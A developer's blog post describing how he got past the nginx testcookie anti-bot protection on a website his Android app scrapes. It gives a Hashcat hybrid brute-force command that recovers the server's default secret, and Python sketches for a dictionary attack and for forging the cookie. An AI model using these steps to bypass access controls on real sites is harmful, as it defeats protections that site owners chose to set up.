A few days ago, I noticed that ApkTrack (an Android app I maintain) could no longer query one of the websites it usually obtains data from. The app works mostly through web scraping and, once in a while, the target websites set up new countermeasures to prevent bots from accessing their contents (even innocuous bots such as this app). In this post, we'll see how I bypassed the protection I encountered this weekend.
It all began when I noticed that a website (whose identity will not be disclosed) returned the following script in lieu of the expected data:
It's plain to see that this script uses a slow AES implementation to generate a cookie required to browse the target website. I notice that the a, b and c variables of the above script change with every try, and while they kind of look like MD5 hashes, none of them can be reversed easily. Time to dig in.
Ideally, I'd like to read the code which generates these values. I'm in luck: a quick search points me to an nginx module called testcookie.
Reading through the 2000-something lines of code is made difficult by the numerous macros coming from nginx, but I understand the following:
- a and b are the key and initialization vector (respectively) used for the AES-CBC computation;
- c is the data to decipher.
- The latter is generated the following way: c = AES(MD5($testcookie_session + $testcookie_secret)), those two variables being defined in the nginx configuration. More precisely:
  - According to the documentation, testcookie_session can either be the visitor's IP address (e.g. 127.0.0.1), or their IP concatenated with the browser's user-agent (e.g. 127.0.0.1Mozilla/5.0 (X11; Ubuntu; Linux x86_64; [...]). This part is predictable and can be generated easily.
  - testcookie_secret, however, is an unknown value. It can be fixed, or random (in which case it changes every time the web server is rebooted).
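To make the formula above more concrete, here is a minimal Python sketch of the MD5 part only (the AES layer is left out). It assumes that the session and the secret are simply concatenated without a separator, as the equation suggests; the function name and the sample values are hypothetical and only serve as an illustration.

```python
import hashlib


def expected_cookie(ip: str, secret: str, user_agent: str = "") -> str:
    """Return MD5(session + secret) as a hex string.

    Assumption: the session is the IP address, optionally followed by the
    user-agent, concatenated without any separator.
    """
    session = ip + user_agent
    return hashlib.md5((session + secret).encode("utf-8")).hexdigest()


# Hypothetical values, for illustration only.
ip_only = expected_cookie("127.0.0.1", "some-secret")
ip_and_ua = expected_cookie("127.0.0.1", "some-secret", "Mozilla/5.0 (X11)")
print(ip_only)
print(ip_and_ua)
```

The two session modes yield different hashes for the same visitor, so knowing which one a website uses matters before attacking the secret.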
First, I need to find out how testcookie_session is generated on the target website, since it is configuration-dependent. That part is easy: I take another browser, navigate to the website and compare the cookies: they're identical. This means that only the IP address is used. Next, I have to guess testcookie_secret's value. We face the following equation:
- I know a valid cookie just by visiting the website: 64534e58cbc178830089d06de12c00ed.
- My IP address at the time was 18.104.22.168.
- We have established that testcookie_session is just the IP address, so 64534e58cbc178830089d06de12c00ed = MD5("18.104.22.168" + testcookie_secret).
This is a textbook bruteforce situation. I fire up Hashcat:
PS C:\Users\Ivan\oclHashcat-1.33> .\oclHashcat64.exe -m0 .\targets\site.txt -a7 22.214.171.124 .\dicts\wordlist.txt
oclHashcat v1.33 starting...
[...]
64534e58cbc178830089d06de12c00ed:126.96.36.199keepmesecret
The -a7 option corresponds to a hybrid attack, which means that every word from the dictionary is prefixed with an arbitrary string (here, my IP address). After a while, Hashcat proudly announces the result: testcookie_secret = keepmesecret. I actually guessed that value before the bruteforce had ended for a simple reason: keepmesecret is the example value given in the documentation and I had tested it manually. When in doubt, always assume the sysadmin was lazy.
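For readers without Hashcat at hand, the same prefixed dictionary attack can be sketched in a few lines of Python. This is only an illustration of the idea, not what Hashcat does internally, and it is far slower. The function name, the tiny wordlist and the demo IP are all made up; the target hash is computed inside the example rather than taken from a real website.

```python
import hashlib
from typing import Iterable, Optional


def find_secret(target_hash: str, prefix: str, words: Iterable[str]) -> Optional[str]:
    """Return the first word such that MD5(prefix + word) equals target_hash."""
    target = target_hash.lower()
    for word in words:
        candidate = word.strip()  # drop trailing newlines when reading from a file
        digest = hashlib.md5((prefix + candidate).encode("utf-8")).hexdigest()
        if digest == target:
            return candidate
    return None


# Self-contained demonstration with made-up values: the target hash is built
# here instead of being collected from a website.
demo_ip = "127.0.0.1"
demo_target = hashlib.md5((demo_ip + "keepmesecret").encode("utf-8")).hexdigest()
demo_words = ["password", "changeme", "keepmesecret", "letmein"]
found = find_secret(demo_target, demo_ip, demo_words)
print(found)
```

With a real wordlist, an open file handle can be passed as the words argument, since each line is stripped before hashing.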
We now have everything needed to forge our cookies, and computing an MD5 hash before each request is all it takes to bypass the protection.
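As a rough sketch, forging the cookie could look like the following in Python. The URL, the IP address and the cookie name (TCK here) are assumptions made for the example: use whatever cookie name the target website actually sets. The request is only built, not sent.

```python
import hashlib
import urllib.request


def forge_request(url: str, ip: str, secret: str,
                  cookie_name: str = "TCK") -> urllib.request.Request:
    """Build a request carrying the cookie MD5(ip + secret).

    Assumptions: the session is the IP address only, and cookie_name is a
    placeholder for the name used by the target website.
    """
    value = hashlib.md5((ip + secret).encode("utf-8")).hexdigest()
    request = urllib.request.Request(url)
    request.add_header("Cookie", f"{cookie_name}={value}")
    return request


# Hypothetical URL and IP address, for illustration only.
req = forge_request("http://example.com/", "127.0.0.1", "keepmesecret")
print(req.get_header("Cookie"))
```

Passing the resulting object to urllib.request.urlopen would send it. The hash only has to be recomputed when the public IP address changes.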
EDIT: Following this post, testcookie_secret's minimum size has been increased to 32 characters in the latest version of the module.